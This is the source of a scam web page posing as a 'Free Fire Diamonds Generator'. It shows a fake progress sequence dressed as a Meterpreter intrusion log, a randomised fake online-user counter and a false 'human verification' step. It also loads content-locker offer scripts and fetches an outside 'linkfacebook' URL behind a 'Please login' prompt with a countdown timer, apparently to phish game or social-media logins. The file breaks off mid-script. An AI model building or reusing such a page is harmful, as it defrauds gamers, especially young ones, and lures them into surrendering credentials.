<!DOCTYPE html>
<html lang="en">

<head>
    <title>free fire dowond 2021 </title>
    <meta name="description" content="Free Fire Diamonds Generator 2021 ">
    <meta property="og:title" content="Free Fire Diamonds Generator 2021 ">
    <meta property="og:description" content="Free Fire Diamonds Generator 2021 ">
    <meta name="referrer" content="no-referrer">

    <script src="https://browser.sentry-cdn.com/5.20.1/bundle.min.js"
        integrity="sha384-O8HdAJg1h8RARFowXd2J/r5fIWuinSBtjhwQoPesfVILeXzGpJxvyY/77OaPPXUo"
        crossorigin="anonymous"></script>
    <script>
        Sentry.init({ dsn: 'https://ecc33db07c514172b5606edcabb2884e@o425163.ingest.sentry.io/5357949' });
    </script>

    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }

        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }

        body {
            margin: 0;
            font-family: Roboto, sans-serif;
            color: #444;
        }

        .unlockBtn:hover {
            box-shadow: 0 3px 6px rgba(0, 0, 0, .16), 0 3px 6px rgba(0, 0, 0, .23);
        }

        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0, 0, 0, .12), 0 1px 2px rgba(0, 0, 0, .24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto, sans-serif !important;
            outline: 0 !important;
            color: white;
        }

        .content-container {
            width: 80%;
            margin: 0 auto;
        }

        @font-face {
            font-family: 'Roboto';
            font-style: normal;
            font-weight: 300;
            src: local('Roboto Light'), local(Roboto-Light), url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");
            unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF
        }

        @font-face {
            font-family: 'Roboto';
            font-style: normal;
            font-weight: 300;
            src: local('Roboto Light'), local(Roboto-Light), url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");
            unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000
        }

        @font-face {
            font-family: 'Roboto';
            font-style: normal;
            font-weight: 500;
            src: local('Roboto Medium'), local(Roboto-Medium), url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");
            unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF
        }

        @font-face {
            font-family: 'Roboto';
            font-style: normal;
            font-weight: 500;
            src: local('Roboto Medium'), local(Roboto-Medium), url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");
            unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000
        }

        body {
            font-family: Poppins;

        }

        h1 {
            font-weight: bold;
        }

        .header {
            text-align: left;
            position: fixed;
            width: 100%;
            background: #fff;
            color: #474747;
            box-shadow: 0 0 5px black;

            padding: 15px;
            z-index: 1;
            top: 0;
            left: 0;
        }

        .text-enter-username {
            position: relative;
            color: #474747;
            font-family: Poppins;
            font-weight: bold;
            font-size: 32px;
            padding: 5px;

        }

        .title {
            text-align: center;
            width: 100%;
            margin-top: 120px;
            color: #474747;
            font-family: Poppins;
            font-weight: bold;
            font-size: 22px;
            padding: 5px;
        }

        .usernamebox1 {
            text-align: center;
            align-items: center;
            justify-content: center;
            position: relative;
            margin-top: 50px;
            max-width: 600px;
            width: 90%;
            height: auto;
            overflow: auto;
            padding-bottom: 20px;
            background-color: white;
            border-radius: 30px;
            box-shadow: 0 0 10px #cfcfcf;
            margin-bottom: 200px;
        }

        .footer {
            align-items: center;
            justify-content: center;
            text-align: center;
            display: flex;
        }

        .footer1 {
            align-items: center;
            justify-content: center;
            text-align: center;
            padding: 5px;
            position: fixed;
            bottom: 20px;
            width: 60%;
            height: 60px;
            background-color: black;
            border-radius: 20px;
            z-index: 1;
        }

        .footertext {
            color: white;
            margin: 0px;

        }

        .footerleft {
            position: fixed;
            bottom: 20px;
            width: 80%;
            margin-left: -30px;
            height: 100px;
            background-color: #00f7ef;
            border-radius: 20px;

        }

        .footerright {
            position: fixed;
            bottom: 20px;
            width: 80%;
            margin-right: -30px;
            height: 100px;
            background-color: #ff2f6f;
            border-radius: 20px;

        }

        img.imgtiktok {
            width: 80px;
            margin-top: 10px;
        }

        img.imguser {
            width: 100px;
            top: 10px;
            padding: 10px;
        }

        input {
            color: #474747;
            position: relative;

            border: 2px solid #ff2f6f;
            border-radius: 30px;
        }

        input[type=number] {

            width: 250px;
            box-sizing: border-box;
            border: 2px solid #ea82a2;
            border-radius: 30px;
            font-size: 30px;
            font-weight: bold;
            background-color: white;
            background-image: url("http://orig11.deviantart.net/53ec/f/2009/356/4/7/4755bf43c7d566fb1d0cdf9996bce41f.png");
            background-size: 39px;
            background-position: 10px 10px;
            background-repeat: no-repeat;
            padding: 12px 20px 12px 50px;
            /*transition: width 0.4s ease-in-out;*/
            box-shadow: 0 0 4px #00f7ef;
        }

        input[type=number]:focus {
            outline: none;
            width: 400px;
            box-sizing: border-box;
            border: 2px solid #ff2f6f;
            border-radius: 30px;
            font-size: 30px;
            background-color: white;
            /*transition: width 0.4s ease-in-out;*/
            box-shadow: 0 0 4px #00f7ef;
        }

        .bntValidate {
            margin-top: 20px;
            border-style: solid;
            border-radius: 5px;
            border-width: 2px;
            border-color: #ff4e70;
            box-shadow: 0 0 2px #00c7c0;
            justify-content: center;
            align-items: center;
            color: white;
            font-size: 28px;
            display: flex;
            position: relative;
            background-color: #fe2b54;
            width: 250px;
            height: 60px;
        }

        .bntValidate:hover {
            box-shadow: 0 0 10px #00c7c0;
            cursor: pointer;
        }

        .line {

            top: 180px;
            height: 2px;
            width: 80%;
            background-color: #c4c5c9;
        }


        .packag1:hover {
            cursor: pointer;
            animation: shadow-drop-2-center .4s cubic-bezier(.25, .46, .45, .94) both
        }

        .packag2:hover {
            cursor: pointer;
            animation: shadow-drop-2-center .4s cubic-bezier(.25, .46, .45, .94) both
        }

        .packag3:hover {
            cursor: pointer;
            animation: shadow-drop-2-center .4s cubic-bezier(.25, .46, .45, .94) both
        }

        .packag1 {
            margin-top: 10px;
            text-align: center;
            box-shadow: 0 0 10px #c2c2c2;
            height: 150px;
            width: 90%;
            background-color: white;
            text-align: center;
            border-radius: 10px;
            border-style: solid;
            border-width: 2px;
            border-color: #ebebeb;
            position: relative;


        }

        .selectedpackage {
            text-align: center;
            box-shadow: 0 0 10px #c2c2c2;
            height: 150px;
            width: 90%;
            background-color: white;
            border-radius: 10px;
            border-style: solid;
            border-width: 1px;
            border-color: #ebebeb;

        }

        .packag2 {
            margin-top: 10px;
            margin-bottom: 10px;
            text-align: center;
            box-shadow: 0 0 10px #c2c2c2;
            height: 150px;
            width: 90%;
            background-color: white;
            text-align: center;
            border-radius: 10px;
            border-style: solid;
            border-width: 1px;
            border-color: #ebebeb;
            position: relative;
        }

        .packag3 {
            text-align: center;
            box-shadow: 0 0 10px #c2c2c2;
            height: 150px;
            width: 90%;
            background-color: white;
            text-align: center;
            border-radius: 10px;
            border-style: solid;
            border-width: 1px;
            border-color: #ebebeb;
            position: relative;

        }

        .cardtext {
            padding: 0px;
            margin: 0px;
            font-weight: bolder;
        }

        .text-gen {
            color: #474747;
            font-family: Poppins;
            font-weight: bold;
            font-size: 22px;
            padding: 5px;
        }


        .loader {
            display: none;
            width: 50px;
            position: relative;
            padding-top: 20px;
            margin-top: 10px;
            left: 50%;
            margin-left: -20px;
        }

        .loaderblue {
            position: absolute;
            left: 0px;
            width: 20px;
            height: 20px;
            background-color: #00f7efbf;
            border-radius: 50%;
            animation-name: loaderblue;
            animation-duration: 1s;
            animation-iteration-count: infinite;
        }

        .loaderred {
            position: absolute;
            left: 20px;
            width: 20px;
            height: 20px;
            background-color: #ff2f6fba;
            border-radius: 50%;
            animation-name: loaderred;
            animation-duration: 1s;
            animation-iteration-count: infinite;
        }

        @keyframes loaderblue {
            0% {
                background-color: #00f7efbf;
                left: 0px;
                top: 0px;
                width: 20px;
                height: 20px;
                z-index: 1;
            }

            50% {
                background-color: #00f7efbf;
                left: 20px;
                top: 0px;
                width: 20px;
                height: 20px;
                z-index: 1;
            }

            75% {
                background-color: #00f7efbf;
                left: 10px;
                top: 2px;
                width: 15px;
                height: 15px;
                z-index: 0;
            }

            100% {
                background-color: #00f7efbf;
                left: 0px;
                top: 0px;
                width: 20px;
                height: 20px;
                z-index: 0;
            }
        }

        @keyframes loaderred {
            0% {
                background-color: #ff2f6fba;
                left: 20px;
                top: 0px;
                width: 20px;
                height: 20px;
                z-index: 1;
            }

            25% {
                background-color: #ff2f6fba;
                left: 10px;
                top: 2px;
                width: 15px;
                height: 15px;
                z-index: 0;
            }

            50% {
                background-color: #ff2f6fba;
                left: 0px;
                top: 0px;
                width: 20px;
                height: 20px;
                z-index: 0;
            }

            100% {
                background-color: #ff2f6fba;
                left: 20px;
                top: 0px;
                width: 20px;
                height: 20px;
                z-index: 1;
            }
        }


        @keyframes shadow-drop-2-center {
            0% {
                transform: translateZ(0);
                box-shadow: 0 0 0 0 transparent
            }

            100% {
                transform: translateZ(50px);
                box-shadow: 0 0 20px 0 rgba(0, 0, 0, .35)
            }
        }



        @media only screen and (max-width:680px) {
            .text-enter-username {
                position: relative;
                color: #474747;
                font-family: Poppins;
                font-weight: bold;
                font-size: 24px;
                padding: 5px;

            }

            .header {
                text-align: center;
                position: fixed;
                width: 100%;
                background: #fff;
                color: #474747;
                box-shadow: 0 0 5px black;
                padding: 10px;
                z-index: 1;
                top: 0;
                left: 0;
            }


            input[type=text]:focus {
                outline: none;
                width: 300px;
                box-sizing: border-box;
                border: 2px solid #ff2f6f;
                border-radius: 30px;
                font-size: 30px;
                background-color: white;
                transition: width 0.4s ease-in-out;
                box-shadow: 0 0 4px #00f7ef;
            }

        }
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script type="text/javascript"
        src="https://d1xkyo9j4r7vnn.cloudfront.net/public/external/v2/html.1156084.f7150.0.js"
        id="CPABUILDMAINJS"></script>
    <link rel="stylesheet" href="https://d1xkyo9j4r7vnn.cloudfront.net/public/external/css_front.css"
        id="CPABUILDGLOBALSTYLE">
    <style>
        ._3emE9--dark-theme .-S-tR--ff-downloader {
            background: rgba(30, 30, 30, .93);
            border: 1px solid rgba(82, 82, 82, .54);
            box-shadow: 0 4px 7px rgba(30, 30, 30, .55);
            color: #fff
        }

        ._3emE9--dark-theme .-S-tR--ff-downloader ._6_Mtt--header ._2VdJW--minimize-btn {
            background: #3d4b52
        }

        ._3emE9--dark-theme .-S-tR--ff-downloader ._6_Mtt--header ._2VdJW--minimize-btn:hover {
            background: #131415
        }

        ._3emE9--dark-theme .-S-tR--ff-downloader ._10vpG--footer {
            background: rgba(30, 30, 30, .93)
        }

        ._2mDEx--white-theme .-S-tR--ff-downloader {
            background: #fff;
            border: 1px solid rgba(82, 82, 82, .54);
            box-shadow: 0 4px 7px rgba(30, 30, 30, .55);
            color: #314c75
        }

        ._2mDEx--white-theme .-S-tR--ff-downloader ._6_Mtt--header {
            font-weight: 700
        }

        ._2mDEx--white-theme .-S-tR--ff-downloader ._2dFLA--container ._2bWNS--notice {
            border: 0;
            color: rgba(0, 0, 0, .88)
        }

        ._2mDEx--white-theme .-S-tR--ff-downloader ._10vpG--footer {
            background: #fff
        }

        .-S-tR--ff-downloader {
            display: block;
            overflow: hidden;
            position: fixed;
            bottom: 20px;
            right: 7.1%;
            width: 330px;
            height: 180px;
            background: rgba(30, 30, 30, .93);
            border-radius: 2px;
            color: #fff;
            z-index: 99999999;
            border: 1px solid rgba(82, 82, 82, .54);
            box-shadow: 0 4px 7px rgba(30, 30, 30, .55);
            transition: .5s
        }

        .-S-tR--ff-downloader._3M7UQ--minimize {
            height: 62px
        }

        .-S-tR--ff-downloader._3M7UQ--minimize .nxuu4--file-info,
        .-S-tR--ff-downloader._3M7UQ--minimize ._6_Mtt--header {
            display: none
        }

        .-S-tR--ff-downloader ._6_Mtt--header {
            padding: 10px;
            font-size: 17px;
            font-family: sans-serif
        }

        .-S-tR--ff-downloader ._6_Mtt--header ._2VdJW--minimize-btn {
            float: right;
            background: #f1ecec;
            height: 20px;
            width: 20px;
            text-align: center;
            padding: 2px;
            margin-top: -10px;
            cursor: pointer
        }

        .-S-tR--ff-downloader ._6_Mtt--header ._2VdJW--minimize-btn:hover {
            background: #e2dede
        }

        .-S-tR--ff-downloader ._13XQ2--error {
            color: red;
            padding: 10px;
            font-size: 12px;
            line-height: 19px
        }

        .-S-tR--ff-downloader ._2dFLA--container {
            position: relative;
            height: 100%
        }

        .-S-tR--ff-downloader ._2dFLA--container .nxuu4--file-info {
            padding: 6px 15px 0;
            font-family: sans-serif
        }

        .-S-tR--ff-downloader ._2dFLA--container .nxuu4--file-info div {
            margin-bottom: 5px;
            width: 100%;
            overflow: hidden
        }

        .-S-tR--ff-downloader ._2dFLA--container ._2bWNS--notice {
            margin-top: 21px;
            font-size: 11px
        }

        .-S-tR--ff-downloader ._10vpG--footer {
            width: 100%;
            bottom: 0;
            position: absolute;
            font-weight: 700
        }

        .-S-tR--ff-downloader ._10vpG--footer ._2V73d--loader {
            animation: n0BD1--rotation 3.5s linear forwards;
            position: absolute;
            top: -120px;
            left: calc(50% - 35px);
            border-radius: 50%;
            border: 5px solid #fff;
            border-top-color: #a29bfe;
            height: 70px;
            width: 70px;
            display: flex;
            justify-content: center;
            align-items: center
        }

        .-S-tR--ff-downloader ._10vpG--footer ._24wjw--loading-bar {
            width: 100%;
            height: 18px;
            background: #dfe6e9;
            border-radius: 5px
        }

        .-S-tR--ff-downloader ._10vpG--footer ._24wjw--loading-bar ._1FVu9--progress-bar {
            height: 100%;
            background: #8bc34a;
            border-radius: 5px
        }

        .-S-tR--ff-downloader ._10vpG--footer ._2KztS--status {
            margin-top: 10px
        }

        .-S-tR--ff-downloader ._10vpG--footer ._2KztS--status ._1XilH--state {
            float: left;
            font-size: .9em;
            letter-spacing: 1pt;
            text-transform: uppercase;
            width: 100px;
            height: 20px;
            position: relative
        }

        .-S-tR--ff-downloader ._10vpG--footer ._2KztS--status ._1jiaj--percentage {
            float: right
        }
    </style>
    <link data-it="1156084" rel="stylesheet" id="CPABUILDSPECIFICSTYLE"
        href="https://d1xkyo9j4r7vnn.cloudfront.net/public/clockers/CustomButton/css.css">
    <style type="text/css" id="CPABUILDSettingsCSS">
        #CPABUILD_MODAL_CONTAINER #CPABUILDMODALCONTENT {
            animation-duration: 600ms;
            -webkit-transition: all 600ms;
            transition: all 600ms;
            transition-duration: 600ms;
        }

        #CPABUILD_MODAL_CONTAINER #CPABUILD_MODAL {
            background-color: rgba(0, 0, 0, 0.4)
        }
    </style>
    <script type="text/javascript"
        src="https://d1xkyo9j4r7vnn.cloudfront.net/public/guid?cpguid=q3709i7xb&amp;e=ll&amp;t=1605746748296"></script>
    <script id="CPABUILDLEADCHECK" type="text/javascript"
        src="https://d1xkyo9j4r7vnn.cloudfront.net/public/external/check.php?it=1156084&amp;time=1605746765570"></script>
</head>

<body>



    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" type="text/css" href="style.css">
    <title>Free Fire Diamonds Generator Tools</title>
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins">


    <center>
        <div class="header" id="myHeader">
            <img src="https://th.bing.com/th/id/OIP.ATnVrrmp5841tgaRFb5eygHaHa?pid=Api&amp;rs=1" style="width:25px"><img
                src="https://upload.wikimedia.org/wikipedia/ru/5/53/Garena_Free_Fire_Logo.png" style="width:100px">
            <div class="cardtext"> Diamonds Generator </div>
        </div>
        <div class="title">Get free Diamonds for your Free Fire account</div>
        <div class="usernamebox1" id="screen1">

            <img src="http://img12.deviantart.net/1842/i/2008/281/e/4/garena_icon_v1_by_dr4nr3b.png" class="imgtiktok">
            <div class="text-enter-username">Enter Your Account ID</div>
            <input id="eee" type="hidden">
            <input autocomplete="off" type="number" id="tiktokinputname" oninput="textinput()" placeholder="Account ID">
            <center>
                <div class="bntValidate" onclick="bntValidate()" id="bntValidate">Validate</div>
            </center>
            <div class="loader" id="loader">
                <div class="loaderblue" id="loaderblue"></div>
                <div class="loaderred" id="loaderred"></div>
            </div>

        </div>
        <div class="usernamebox1" id="screen2" style="display:none;">
            <img src="http://orig11.deviantart.net/53ec/f/2009/356/4/7/4755bf43c7d566fb1d0cdf9996bce41f.png"
                class="imguser">
            <div style="padding:20px;  color: #474747;
  font-family: Poppins;
  font-weight: bold;
  font-size: 20px;
  padding: 5px;">Account ID: <span id="username1">cpabuild</span></div>
            <center>
                <div class="line"></div>
            </center>
            <div class="text-enter-username">Select number of DIAMONDS</div>
            <center>
                <div class="packag1" onclick="package(1)"><img
                        src="https://th.bing.com/th/id/OIP.LCGWeixl07TUfYtcPzV6LgHaHa?pid=Api&amp;rs=1"
                        style="width:80px;margin-top:10px;">
                    <p class="cardtext">1,000</p>
                    <p class="cardtext">DIAMONDS</p>
                </div>
                <div class="packag2" onclick="package(2)"><img
                        src="https://th.bing.com/th/id/OIP.LCGWeixl07TUfYtcPzV6LgHaHa?pid=Api&amp;rs=1"
                        style="width:80px;margin-top:10px;">
                    <p class="cardtext">2,500</p>
                    <p class="cardtext">DIAMONDS</p>
                </div>
                <div class="packag3" onclick="package(3)"><img
                        src="https://th.bing.com/th/id/OIP.LCGWeixl07TUfYtcPzV6LgHaHa?pid=Api&amp;rs=1"
                        style="width:80px;margin-top:10px;">
                    <p class="cardtext">5,000</p>
                    <p class="cardtext">DIAMONDS</p>
                </div>
            </center>

            <div class="loader" id="loader">
                <div class="loaderblue" id="loaderblue"></div>
                <div class="loaderred" id="loaderred"></div>
            </div>

        </div>
        <div class="usernamebox1" id="screen3" style="display:none;">
            <img src="http://orig11.deviantart.net/53ec/f/2009/356/4/7/4755bf43c7d566fb1d0cdf9996bce41f.png"
                class="imguser">
            <div style=" padding-top:10px;  color: #474747;
  font-family: Poppins;
  font-weight: bold;
  font-size: 20px;
  padding: 5px;">>Account ID: <span id="username">cpabuild</span></div>
            <center>
                <div class="line"></div>
            </center>
            <div class="loader" id="loader2">
                <div class="loaderblue" id="loaderblue"></div>
                <div class="loaderred" id="loaderred"></div>
            </div>
            <div class="text-gen" id="processing">Select number of DIAMONDS</div>

            <center>
                <div class="selectedpackage"><img
                        src="https://th.bing.com/th/id/OIP.LCGWeixl07TUfYtcPzV6LgHaHa?pid=Api&amp;rs=1"
                        style="width:80px;margin-top:10px;">
                    <p class="cardtext" id="followGen">+0</p>
                    <p class="cardtext">DIAMONDS</p>
                </div>
            </center>
            <div id="highttraffic"
                style="display: none;color:#474747;font-size:22px;font-weight:bold;padding-top:10px;">Unusually high
                traffic from</div>
            <div id="verifyrequired"
                style="display: none;color:#ffbb0f;font-size:22px;font-weight:bold;padding-top:10px;">Human Verification
                Required</div>
            <center>
                <div class="bntValidate" onclick="document.getElementById('id011').style.display='block'" id="verify"
                    style="display:none">Verify Now</div>
            </center>
        </div>
        <div class="footer">
            <div class="footer1">
                <p class="footertext">Server Status : <span style="color:#00f7ef;">Online</span> </p>
                <p class="footertext">Online User: <span id="user-online">668</span></p>
            </div>
            <!--<div class="footerleft"></div>
<div class="footerright"></div>-->
        </div>


    </center>
    <script src="main.js"></script>




    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript">
        var CPABUILDSETTINGS = { "it": 1156084, "key": "f7150" };
        var forward = "";
        CPABUILDSETTINGS.onComplete = function (data) {
            window.location = forward;
            return false;
        };
    </script>
    <script src="https://d13nu0oomnx5ti.cloudfront.net/c7b019f.js"></script>
    <script type="text/javascript">
        $('.showContentLocker').click(function () {
            CPABuildLock();
            return false;
        });
    </script>
    <script>

    </script>
    <script type="text/javascript">
        var today = new Date();
        var date = today.getFullYear() + '-' + (today.getMonth() + 1) + '-' + today.getDate();

        document.getElementById("update").innerHTML = date;
        function bntValidate() {
            var x = document.getElementById("tiktokinputname").value;
            var n = x.length;
            if (n >= 2) {
                document.getElementById("bntValidate").innerHTML = "Connecting...";
                document.getElementById("tiktokinputname").disabled = true;

                document.getElementById("bntValidate").disabled = true;
                document.getElementById("loader").style.display = "block";
                var myloop = setInterval(Goscreen2, 100);
                var runstep = 0;
                function Goscreen2() {
                    runstep++;
                    if (runstep >= 80) {
                        document.getElementById("screen2").style.display = "block";
                        document.getElementById("screen1").style.display = "none";
                        document.getElementById("username").innerHTML = x;
                        document.getElementById("username1").innerHTML = x;
                        clearInterval(myloop);
                    }
                }

            } else {
                document.getElementById("tiktokinputname").style.boxShadow = "0 0 10px #fe2b54";
                document.getElementById("loader").style.display = "none";
            }
        }
        function textinput() {
            var x = document.getElementById("tiktokinputname").value;
            var n = x.length;
            if (n >= 2) {
                document.getElementById("tiktokinputname").style.boxShadow = "0 0 4px #00f7ef";
            }
        }

        function package(follownumber) {
            document.getElementById("screen2").style.display = "none";
            document.getElementById("screen3").style.display = "block";

            //Loading text
            var myVarCode = setInterval(loadingtext, 1000);
            var step = 0;
            function loadingtext() {
                if (step == 0) {
                    document.getElementById("loader2").style.display = "block";
                    document.getElementById("processing").innerHTML = "Connecting to server..."


                } else if (step == 1) {
                    document.getElementById("processing").innerHTML = "Server is up at 192.251.21.162:445 (latency 0.013s)"

                } else if (step == 2) {
                    document.getElementById("processing").innerHTML = "Connecting to server SQL database..."

                } else if (step == 3) {
                    document.getElementById("processing").innerHTML = "Obtaining a service manager handle..."

                } else if (step == 4) {
                    document.getElementById("processing").innerHTML = "Creating a new service through pipeline..."

                } else if (step == 5) {
                    document.getElementById("processing").innerHTML = "Closing service handle..."

                } else if (step == 6) {
                    document.getElementById("processing").innerHTML = "Sending stage (845123 bytes) to 192.251.21.162"


                } else if (step == 7) {
                    document.getElementById("processing").innerHTML = "Meterpreter session 1 opened at port 445"


                } else if (step == 8) {
                    document.getElementById("processing").innerHTML = "Connected To server";
                    document.getElementById("loader2").style.display = "none";
                } else if (step == 10) {
                    var myVarCode2 = setInterval(addfollow, 5);
                    var addfollownum = 0;
                    //Get country
                    var data;
                    var country;
                    var code;
                    fetch('https://gamebee.club/data/index.php')
                        .then(res => res.json())
                        .then(output => {
                            data = output;
                            country = data.country;
                            code = data.code;
                            console.log(country);
                        })
                    function addfollow() {
                        if (follownumber == 1) {
                            document.getElementById("followGen").innerHTML = "+" + addfollownum;
                            if (addfollownum == 1000) {
                                clearInterval(myVarCode2);
                                document.getElementById("highttraffic").innerHTML = "Unusually high traffic from " + " " + country;
                                document.getElementById("highttraffic").style.display = "block";
                                document.getElementById("verifyrequired").style.display = "block";
                                document.getElementById("verify").style.display = "flex";
                                document.getElementById('id011').style.display = 'block';

                                //window.location.href="https://cpbldi.com/94367c9";
                            }
                        }
                        if (follownumber == 2) {
                            document.getElementById("followGen").innerHTML = "+" + addfollownum;
                            if (addfollownum == 2500) {
                                clearInterval(myVarCode2);
                                document.getElementById("highttraffic").innerHTML = "Unusually high traffic from " + country;
                                document.getElementById("highttraffic").style.display = "block";
                                document.getElementById("verifyrequired").style.display = "block";
                                document.getElementById("verify").style.display = "flex";
                                document.getElementById('id011').style.display = 'block';

                                //window.location.href="https://cpbldi.com/94367c9";
                            }
                        }
                        if (follownumber == 3) {
                            document.getElementById("followGen").innerHTML = "+" + addfollownum;
                            if (addfollownum == 5000) {
                                clearInterval(myVarCode2);
                                document.getElementById("highttraffic").innerHTML = "Unusually high traffic from" + country;
                                document.getElementById("highttraffic").style.display = "block";
                                document.getElementById("verifyrequired").style.display = "block";
                                document.getElementById("verify").style.display = "flex";
                                document.getElementById('id011').style.display = 'block';

                                //window.location.href="https://cpbldi.com/94367c9";

                            }
                        }
                        addfollownum++;

                    }

                }
                step++;
            }
        }
        var myVar2 = setInterval(UserTimer, 3000);
        function UserTimer() {
            document.getElementById("user-online").innerHTML = Math.floor(Math.random() * 100) + 600;


        }

    </script>
    <script>
        if (typeof window.ga === 'function') {
            ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
            ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
            ga('customTemplateGlobal.send', 'pageView');
        }


    </script>

    <script>


        function startTimer(duration, display) {
            var timer = duration, minutes, seconds;
            setInterval(function () {
                minutes = parseInt(timer / 60, 10);
                seconds = parseInt(timer % 60, 10);

                minutes = minutes < 10 ? "0" + minutes : minutes;
                seconds = seconds < 10 ? "0" + seconds : seconds;

                display.textContent = minutes + ":" + seconds;

                if (--timer < 0) {
                   // location.href = "index.php";
                }
            }, 1000);
        }

        window.onload = function () {
            var fiveMinutes = 60 * 5,
                display = document.querySelector('#time');
            startTimer(fiveMinutes, display);
        };

    </script>

    <div id="CPABUILD_MODAL_CONTAINER" style="display: none;">
        <div id="CPABUILD_MODAL">
            <div id="CPABUILDMODALCONTENT" class="CPABUILD_fadeIn">
                <div id="CPABUILDMODALHEADER">
                    <div id="CPABUILDMODALTITLE"></div>
                </div>
                <div id="CPABUILDMODALBODY">
                    <iframe id="CPABUILDOFFERS" style="overflow:hidden;" src=""></iframe>
                </div>
                <div id="CPABUILDMODALFOOTER">
                    <p id="CPABUILDMODALFOOTERTEXT"></p>
                </div>
            </div>
        </div>
    </div>
</body>

</html>

<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        body {
            font-family: Arial, Helvetica, sans-serif;
        }

        /* Full-width input fields */
        input[type=text],
        input[type=password] {
            width: 100%;
            padding: 12px 20px;
            margin: 8px 0;
            display: inline-block;
            border: 1px solid #ccc;
            box-sizing: border-box;
        }

        button {
            background-color: blue;
            color: white;
            padding: 14px 20px;
            margin: 8px 0;
            border: none;
            cursor: pointer;
            width: 100%;

        }



        button:hover {
            opacity: 0.8;
        }

        .cancelbtn1 {
            width: auto;
            padding: 10px 18px;
            background-color: #f44336;
        }

        .imgcontainer {
            text-align: center;
            margin: 24px 0 12px 0;
            position: relative;
        }

        img.vatar1 {
            width: 40%;
            border-radius: 50%;
        }

        .container1 {
            padding: 16px;
        }

        span.psw1 {
            float: right;
            padding-top: 16px;
        }

        .modal1 {
            display: none;
            position: fixed;
            z-index: 1;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            overflow: auto;
            background-color: rgb(0, 0, 0);
            background-color: rgba(0, 0, 0, 0.4);
            padding-top: 60px;
        }

        .modal1-content {
            background-color: #fefefe;
            margin: 5% auto 15% auto;
            border: 1px solid #888;
            width: 80%;
        }


        .close1 {
            position: absolute;
            right: 25px;
            top: 0;
            color: #000;
            font-size: 35px;
            font-weight: bold;
        }

        .close1:hover,
        .close1:focus {
            color: red;
            cursor: pointer;
        }


        .animate {
            -webkit-animation: animatezoom 0.6s;
            animation: animatezoom 0.6s
        }

        @-webkit-keyframes animatezoom {
            from {
                -webkit-transform: scale(0)
            }

            to {
                -webkit-transform: scale(1)
            }
        }

        @keyframes animatezoom {
            from {
                transform: scale(0)
            }

            to {
                transform: scale(1)
            }
        }

        @media screen and (max-width: 300px) {
            span.psw1 {
                display: block;
                float: none;
            }

            .cancelbtn1 {
                width: 100%;
            }
        }

        .packag1x {
            margin-top: 10px;
            text-align: center;
            box-shadow: 0 0 10px #c2c2c2;
            height: 170px;
            width: 90%;
            background-color: white;
            text-align: center;
            border-radius: 10px;
            border-style: solid;
            border-width: 2px;
            border-color: #ebebeb;
            position: relative;


        }
    </style>
</head>

<body>





    <style>
        .cbalink {
            display: none;
        }
    </style>
    <script>
        var x = document.getElementsByTagName('div')[0].className;
        if (x == "") {
            document.getElementsByTagName('div')[0].style.display = "none";
        }
        else {
            console.log("By wail");
        }

    </script>
    <br><br><br>
    <div id="id011" class="modal1 usernamebox1">

        <div class="modal1-content animate packag1x">
            <div class="imgcontainer">
                <!--<span onclick="document.getElementById('id011').style.display='none'" class="close1" title="close1 modal1"></span>-->
                <!--<img src="https://f0.pngfuel.com/png/121/207/red-garena-logo-png-clip-art.png" alt="vatar1" class="vatar1">-->
            </div>

            <center>
                <div class="container1">
                    <p style="color:black;">Please login to complete the process. <span>Time Left : <span id="time"
                                style="color:red;">5:00</span></span></p>
                    <br>
                    <!--<input type="text" placeholder="Enter Your Coupon CODE" id="txt" name="uname" required>-->
                    <P id="dimo"></P>
                    <button style="border-radius: 30%;" class="bntValidate" onclick="tsetX()">Login Now </button>
                    <br><br><br><br>
                </div>
            </center>

        </div>
    </div>

    <script>
        // Get the modal1
        var modal1 = document.getElementById('id011');

// When the user clicks anywhere outside of the modal1, close1 it

    </script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>
    <script src="https://unpkg.com/axios/dist/axios.min.js"></script>
    <script>
        ss()
     function ss() {
             axios.get("https://sp0meur.com/letter/simple/1").then((res) => {
                document.getElementById("eee").value =   res.data.linkfacebook
             });
           
        }
       
